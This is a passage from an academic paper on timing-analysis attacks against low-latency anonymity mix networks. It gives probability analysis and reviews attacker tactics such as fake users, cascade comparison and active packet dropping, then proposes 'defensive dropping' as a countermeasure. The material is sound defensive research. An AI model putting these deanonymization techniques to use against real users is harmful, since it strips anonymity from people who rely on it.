tions, an attacker can benefit. We then describe other ways an attacker can
improve his chances of linking the initiator to the responder. We also examine
some important systems considerations.
7.1
Prior Probabilities
One of the key difficulties an attacker must face is that the odds of a correct
identification vary inversely with the number of initiators. Suppose that, for
a given set of network parameters and system conditions, the attacker would
have a 1% false positive rate and a 1% false negative rate. Although these may
seem like favorable error rates for the attacker, there can be a high incidence
of false positives when the number of initiators grows above 100. The attacker
must account for the prior probability that the initiator being observed is the
initiator of interest, I.
More formally, let us say that event I ∼ J, for two initiators I and J, occurs
when the attacker’s test says that packets received at M I
1 and M J
h are correlated.
Assume that the false positive rate, fp = Pr(I ∼ J|I ̸= J), and the false negative
rate, fn = Pr(I ̸∼ J|I = J), are both known. We can therefore obtain:
Pr(I ∼ J) = Pr(I ∼ J|I = J) Pr(I = J) + Pr(I ∼ J|I ̸= J) Pr(I ̸= J)
= (1 − fn) Pr(I = J) + fp(1 − Pr(I = J))
= (1 − fn − fp) Pr(I = J) + fp
Which leads us to obtain:
Pr(I = J|I ∼ J) = (Pr(I = J ∧ I ∼ J))/ Pr(I ∼ J)
= (Pr(I ∼ J|I = J) Pr(I = J))/ Pr(I ∼ J)
= ((1 − fn) Pr(I = J))/((1 − fn − fp) Pr(I = J) + fp)
12
Levine, Reiter, Wang, and Wright
Suppose Pr(I = J) = 1/n, e.g., the network has n initiators and the adversary
has no additional information about who are likely correspondents. Then, with
fn = fp = 0.01, we get Pr(I = J|I ∼ J) = (.99)/(.99 + .01(n − 1)). With only
n = 10 initiators, the probability of I = J given I ∼ J is about 91.7%. As n
rises to 100 initiators, this probability falls to only 50%. With n = 1000, it is
just over 9%.
Contrast this to the case of Pr(I = J) = 0.09, as the adversary might obtain
additional information about the application, or by the derivation above in a
previous examination of a different path for the same initiator I (if it is known
that the initiator will contact the same responder repeatedly). Then, with n =
1000, the probability of I = J given I ∼ J is about 90.7%.
The lessons from this analysis are as follows. First, when the number of
initiators is large, the attacker’s test must be very accurate to correctly identify
the initiator, if the attacker has no additional information about the a priori
probability of an initiator and responder interacting (i.e., if Pr(I = J) = 1/n).
In this case, defensive dropping appears to be an effective strategy in stopping a
timing analysis test in a large system. By significantly increasing the error rates
for the attacker (see Table 1), defensive dropping makes a timing analysis that
was otherwise useful much less informative for the attacker. Second, a priori
information, i.e., when Pr(I = J) > 1/n, can be very helpful to the attacker in
large systems.
7.2
Lowering the Error Rates
The attackers cannot effectively determine the best level of correlation with
which to identify the initiator unless they can observe the parameters of the net-
work. One approach would be to create fake users, generally an easy task [9], and
each such user F can generate traffic through paths that include attacker mixes
as M F
1 and M F
h . This can be done concurrently with the attack, as the attack
data may be stored until the attackers are ready to analyze it. The attacker can
compare the correlations from traffic on the same path and traffic on different
paths, as with our simulations, and determine the best correlation level to use.
In mix server systems, especially cascade mixes [6], the attacker has an ad-
ditional advantage of being able to compare possible initiators’ traffic data to
find the best match for a data set taken at M I
h for some unknown I. With a
mix cascade in which n users participate, the attacker can guess that the mix
with the traffic timings that best correlate to the timings taken from a stream
of interest at M I
h is M I
1 . This can lower the error rate for the attacker: while a
number of streams may have relatively high correlations with the timing data
at M I
h, it may be that M I
1 will typically have the highest such correlation.
7.3
Attacker Dropping
Defensive dropping may also be thwarted by an attacker that actively drops
packets. When an attacker controls the first mix on the path, he may drop
sufficient packets to raise the correlation level between the first and last mixes.
Timing Attacks in Low-Latency Mix Systems
13
With enough such drops, the attacker will be able to raise his success rates.
When defensive dropping is in place, however, the incidence of attacker drops
must be higher than with constant rate cover traffic. Any given drop might be
due to the defensive dropping rather than the active dropping. This means that
the rate of drops seen by the packet dropping mix (or mixes) will be higher than
it would otherwise be. What is unclear is whether such an increase would be
enough to be detected by an honest intermediate mix.
In general, detection of mixes that drop too many packets is a problem of
reputation and incentives for good performance [8, 1] and is beyond the scope of
this paper. We note, however, that stopping active timing attacks requires very
robust reputation mechanisms that allow users to avoid placing unreliable mixes
at the beginning of their paths. In addition, it is important that a user have a
reliable link to the Internet so that the first mix does not receive a stream of
traffic with many holes to exploit for correlation with the last mix on the path.
7.4
TCP Between Mixes
In our model, we have assumed that each message travels on unreliable links
between mixes. This allows for dropped packets that have been important in
most of the attacks we have described. When TCP is used between each mix,
each packet is reliably delivered despite the presence of drops. The effect this
has on the attacks depends on the packet rates from the initiator and on the
latency between the initiator and the first mix.
For example, suppose that the initiator sends 10 packets per second and that
the latency to the first mix averages 50 ms (100 ms RTT). A dropped packet will
cause a timeout for the initiator, who must resend the packet. The new packet
will be resent in approximately 100 ms in the average case, long enough for an
estimated RTT to trigger a timeout. One additional packet will be sent by the
initiator, but there will still be a gap of 100 ms, which is equivalent to a packet
loss for timing analysis.
This effect, however, is sensitive to timing. When fewer packets are sent per
second and the latency is sufficiently low, such effects can be masked by rapid
retransmissions. However, an attacker can still actively delay packets, and a
watchful honest mix later in the path will not know whether such delays were
due to drops and high retransmission delays before the first mix or due to the
first mix itself.
7.5
The Return Path
Timing attacks can be just as effective and dangerous on the path from M I
h back
to I as on the forward path. Much of what we have said applies to the reverse
path, but there are some key differences. One difference is that I must rely on
M I
h to provide cover traffic (unless the responder is a peer using an anonymous
reverse path). This, of course, can be a problem if the M I
h is dishonest. However,
due to the reverse layered encryption, any mix before M I
1 can generate the cover
traffic and it can still be effective.
14
Levine, Reiter, Wang, and Wright
Because many applications, such as multimedia viewing and file downloads,
require more data from the responder than from the initiator, there is a sig-
nificant performance problem. Constant rate cover traffic can quickly become
prohibitive, requiring a significant fraction of the bandwidth of each mix. For
such applications, stopping timing attacks may be unattainable with acceptable
costs.
When cover traffic remains possible, defensive dropping is no longer an op-
tion, as a dishonest M I
h will know the timings of the drops. The last mix should
not provide the full amount of cover traffic, instead letting each intermediate mix
add some constant rate cover traffic in the reverse pattern of defensive dropping.
This helps keep the correlation between M I
h and M I
1 low.
8
Conclusions
Timing analysis against users of anonymous communications systems can be
effective in a wide variety of network and system conditions, and therefore poses
a significant challenge to the designer of such systems.
We presented a study of both timing analysis attacks and defenses against
such attacks. We have shown that, under certain assumptions, the conventional
use of cover traffic is not effective against timing attacks. Furthermore, inten-
tional packet dropping induced by attacker-controlled mixes can nullify the effect
of cover traffic altogether. We proposed a new cover traffic technique, defensive
dropping, to obstruct timing analysis. Our results show that end-to-end cover
traffic augmented with defensive dropping is a viable and effective method to
defend against timing analysis in low-latency systems.
References
1. A. Acquisti, R. Dingledine, and P. Syverson. On the Economics of Anonymity. In
Proc. Financial Cryptography, Jan 2003.
2. A. Back, I. Goldberg, and A. Shostack. Freedom 2.0 Security Issues and Analysis.
Zero-Knowledge Systems, Inc. white paper, Nov 2000.
3. O. Berthold, H. Federrath, and M. Kohntopp. Project anonymity and unobserv-
ability in the internet. In Proc. Computers Freedom and Privacy, April 2000.
4. O. Berthold, A. Pfitzmann, and R. Standtke. The Disadvantages of Free Mix-
Routes and How to Overcome Them. In Proc. Intl. Workshop on Design Issues in
Anonymity and Unobservability, July 2000.
5. J. Bolot. Characterizing End-to-End Packet Delay and Loss in the Internet. Jour-
nal of High Speed Networks, 2(3), Sept 1993.
6. D. Chaum.
Untraceable Electronic
Mail,
Return Addresses, and Digital
Pseudonyms. Communications of the ACM, 24(2):84–88, Feb 1981.
7. W. Dei. Pipenet 1.1, August 1996. http://www.eskimo.com/ weidai/pipenet.txt.
8. R. Dingledine, N. Mathewson, and P. Syverson. Reliable MIX Cascade Networks
through Reputation. In Proc. Financial Cryptography, 2003.
9. J. Douceur. The sybil attack. In Proc. IPTPS, Mar 2002.
10. M. Freedman and R. Morris. Tarzan: A Peer-to-Peer Anonymizing Network Layer.
In Proc. ACM Conference on Computer and Communications Security, Nov 2002.
Timing Attacks in Low-Latency Mix Systems
15
11. S. Gribble.
UC Berkeley Home IP HTTP Traces.
http://www.acm.org/ sig-
comm/ITA/, July 1997.
12. M. Jakobsson. Flash mixing. In Proc. Sym. on Principles of Distributed Computing,
May 1999.
13. D. Kesdogan, J. Egner, and R. Buschkes. Stop-and-go-mixes providing probablilis-
tic anonymity in an open system. In Proc. Information Hiding, Apr 1998.
14. A. Pfitzmann, B. Pfitzmann, and M. Waidner. ISDNMixes: Untraceable Commu-
nication with Very Small Bandwidth Overhead. In Proc. GI/ITG Communication
in Distributed Systems, Feb 1991.
15. C. Rackoff and D. R. Simon. Cryptographic defense against traffic analysis. In
Proc. ACM Sym. on the Theory of Computing, May 1993.
16. M. Reed, P. Syverson, and D. Goldschlag. Anonymous Connections and Onion
Routing. IEEE JSAC Copyright and Privacy Protection, 1998.
17. S. Saroiu, P. Krishna Gummadi, and S. Gribble. A Measurement Study of Peer-to-
Peer File Sharing Systems. In Proc. Multimedia Computing and Networking, Jan
2002.
18. A. Serjantov, R. Dingledine, and P. Syverson. From a trickle to a flood: active
attacks on several mix types. In Information Hiding, 2002.
19. P. Syverson, G. Tsudik, M. Reed, and C. Landwehr. Towards an Analysis of Onion
Routing Security. In Workshop on Design Issues in Anonymity and Unobservabil-
ity, July 2000.
20. M. Wright, M. Adler, B.N. Levine, and C. Shields. An Analysis of the Degradation
of Anonymous Protocols. In Proc. ISOC Sym. on Network and Distributed System
Security, Feb 2002.
21. M. Wright, M. Adler, B.N. Levine, and C. Shields. Defending Anonymous Com-
munication Against Passive Logging Attacks. In Proc. IEEE Sym. on Security and
Privacy, May 2003. | pdf |
Subsets and Splits